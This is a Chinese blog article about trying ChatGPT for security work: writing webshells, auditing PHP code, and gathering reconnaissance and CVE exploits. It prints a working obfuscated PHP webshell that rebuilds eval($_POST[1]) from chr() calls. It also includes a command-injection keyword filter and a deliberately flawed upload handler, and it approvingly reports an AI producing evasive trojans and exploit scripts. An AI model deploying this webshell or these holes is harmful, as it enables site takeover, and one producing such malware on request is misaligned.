前言

ChatGPT是美國(guó)人工智能研究實(shí)驗(yàn)室OpenAI新推出的一種人工智能技術(shù)驅(qū)動(dòng)的自然語(yǔ)言處理工具，最近ChatGPT又出圈了，之前已經(jīng)在技術(shù)社區(qū)火了一把現(xiàn)在傳播到了大眾面前，我不禁又對(duì)這個(gè)神奇的AI產(chǎn)生了一些思考，在之前我只是讓其輔助寫(xiě)一些簡(jiǎn)單的邏輯程序，于是我想知道它是否也能在網(wǎng)絡(luò)安全領(lǐng)域實(shí)現(xiàn)一些它的價(jià)值呢，本文就這個(gè)話(huà)題來(lái)探討一下它在網(wǎng)絡(luò)安全里面一些應(yīng)用和實(shí)踐。

自身定位

在實(shí)踐之前，我想向ChatGPT問(wèn)一下它自己對(duì)于這個(gè)問(wèn)題的回答是什么，即讓它自己對(duì)信息安全領(lǐng)域起的作用進(jìn)行一些分析，結(jié)果還是挺讓人驚訝的：

它回答的十分全面，里面有一些內(nèi)容連我自己都沒(méi)有想到，于是我對(duì)探討它在信息安全領(lǐng)域的作用的興趣進(jìn)一步加深，下面我便對(duì)它進(jìn)行了一些測(cè)試。

構(gòu)造惡意代碼

這里就先以最簡(jiǎn)單的一句話(huà)木馬為例，我向它提問(wèn)是否能構(gòu)造一個(gè)對(duì)網(wǎng)站產(chǎn)生威脅的惡意語(yǔ)句，AI很輕松的便回答出來(lái)了：

看來(lái)簡(jiǎn)單的惡意語(yǔ)句還是對(duì)它來(lái)說(shuō)還是很輕松的，于是我繼續(xù)向它提問(wèn)一些進(jìn)階的問(wèn)題：我讓它用字符編碼的方式來(lái)構(gòu)造惡意木馬：

還是完整的寫(xiě)完了，根據(jù)其代碼邏輯實(shí)際上也是可以利用的，到這我繼續(xù)加深難度：

可能是我嘗試次數(shù)比較少的原因，并沒(méi)有達(dá)到我理想的條件，或許再多增加一些限制條件會(huì)達(dá)到更好的效果，但是不難看出隨著AI的逐漸進(jìn)化，以后我們對(duì)一些WAF或殺毒軟件進(jìn)行測(cè)試時(shí)，可以結(jié)合AI來(lái)對(duì)產(chǎn)品代碼進(jìn)行分析，讓AI構(gòu)造出可以繞過(guò)的木馬。

在測(cè)試時(shí)我還嘗試讓AI分析帶有危險(xiǎn)函數(shù)的代碼，對(duì)下面這段惡意代碼：

<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?> //7.php

AI給出了比較正確的分析

這又給我們提供了一個(gè)思路，通過(guò)AI結(jié)合防火墻來(lái)達(dá)到動(dòng)態(tài)分析惡意請(qǐng)求的想法，進(jìn)而加強(qiáng)我們?cè)O(shè)備的安全性。

漏洞源碼分析

嘗試完上面的項(xiàng)目，我開(kāi)始思考，能否結(jié)合AI來(lái)進(jìn)行代碼審計(jì)，眾所周知,白盒測(cè)試又稱(chēng)結(jié)構(gòu)測(cè)試、透明盒測(cè)試、邏輯驅(qū)動(dòng)測(cè)試或基于代碼的測(cè)試。通過(guò)分析代碼找到里面的漏洞點(diǎn)來(lái)維護(hù)網(wǎng)絡(luò)安全，如果AI和它碰撞會(huì)產(chǎn)生什么樣的火花呢？下面看一個(gè)例子：

我用一個(gè)簡(jiǎn)單的代碼讓其分析一下：

分析代碼：<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|`|%|\x09|\x26|>|</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);

結(jié)果還是很方便理解的，給出了這段代碼的作用以及過(guò)濾的所有字符，我們可以根據(jù)這些提示來(lái)進(jìn)行滲透或者防護(hù)。

之后我讓其分析一個(gè)簡(jiǎn)單的有文件上傳漏洞的代碼：

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上傳出錯(cuò)！';
            }
        } else {
            $msg = '文件類(lèi)型不正確，請(qǐng)重新上傳！';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夾不存在,請(qǐng)手工創(chuàng)建！';
    }
}

經(jīng)過(guò)了十幾次的改善，給了我如下還算合理的回復(fù):

雖然回答沒(méi)啥毛病但這是經(jīng)過(guò)十幾次更新我篩選出來(lái)的，個(gè)人認(rèn)為AI現(xiàn)在還達(dá)不到分析一些大量代碼來(lái)給出一些合理的漏洞攻擊思路，當(dāng)然也可能是我提問(wèn)的方式有問(wèn)題，有時(shí)會(huì)出現(xiàn)答非所問(wèn)的情況，不過(guò)我覺(jué)得隨著技術(shù)更新這些小問(wèn)題應(yīng)該可以解決。

信息收集

在進(jìn)行網(wǎng)站滲透時(shí)，不管是網(wǎng)站信息或是網(wǎng)站所用服務(wù)的信息都是非常重要的，這會(huì)考察一個(gè)滲透人員的信息收集能力，收集到的信息越多對(duì)我們的滲透幫助越大，于是我想試試AI能否協(xié)助我們進(jìn)行這個(gè)操作。

我試著用AI查詢(xún)某網(wǎng)站的旁站，很快便列出了許多：

當(dāng)然這只是最基礎(chǔ)的，我們通過(guò)工具也可以進(jìn)行查詢(xún)，但AI搜索速度還是遠(yuǎn)遠(yuǎn)大于工具的，這不妨是一個(gè)我們進(jìn)行滲透測(cè)試時(shí)可以快速進(jìn)行資產(chǎn)收集的好途徑。說(shuō)到這我們不妨進(jìn)一步思考，作為幫助我們滲透的工具，若我已經(jīng)收集到了網(wǎng)站所用框架以及版本，我想問(wèn)問(wèn)它如何滲透：

這里AI給出了我們一個(gè)可利用的CVE漏洞，那么我繼續(xù)向其提問(wèn)具體利用方式：

就很有意思了，它真的給我們提供了一個(gè)腳本，先不提這個(gè)腳本，我覺(jué)得在滲透中有個(gè)AI能夠隨時(shí)幫助我們收集信息和腳本這能大大加快我們的滲透過(guò)程，我希望未來(lái)能發(fā)展成這樣的趨勢(shì)。讓滲透人員少一些不必要的操作從而加大效率。

結(jié)語(yǔ)

目前ChatGPT為了防止惡意用戶(hù)的應(yīng)用，限制了對(duì)于主動(dòng)構(gòu)造攻擊腳本的一些請(qǐng)求，這使得其不能展現(xiàn)更多的在信息安全領(lǐng)域的價(jià)值，本文結(jié)合我在之前收集的一些資料，簡(jiǎn)單分析了一下ChatGPT在網(wǎng)絡(luò)安全領(lǐng)域的一些可能性，其中包含了一些已經(jīng)實(shí)現(xiàn)和希望未來(lái)可以實(shí)現(xiàn)的一些想法，無(wú)論是AI構(gòu)造代碼或者進(jìn)行全自動(dòng)白盒分析，這都會(huì)對(duì)我們網(wǎng)絡(luò)安全領(lǐng)域產(chǎn)生一些深遠(yuǎn)的影響，我希望這些想法可以在不遠(yuǎn)的未來(lái)實(shí)現(xiàn)。

以上就是ChatGPT在信息安全中的應(yīng)用淺析的詳細(xì)內(nèi)容，更多關(guān)于ChatGPT信息安全應(yīng)用的資料請(qǐng)關(guān)注腳本之家其它相關(guān)文章！

最新評(píng)論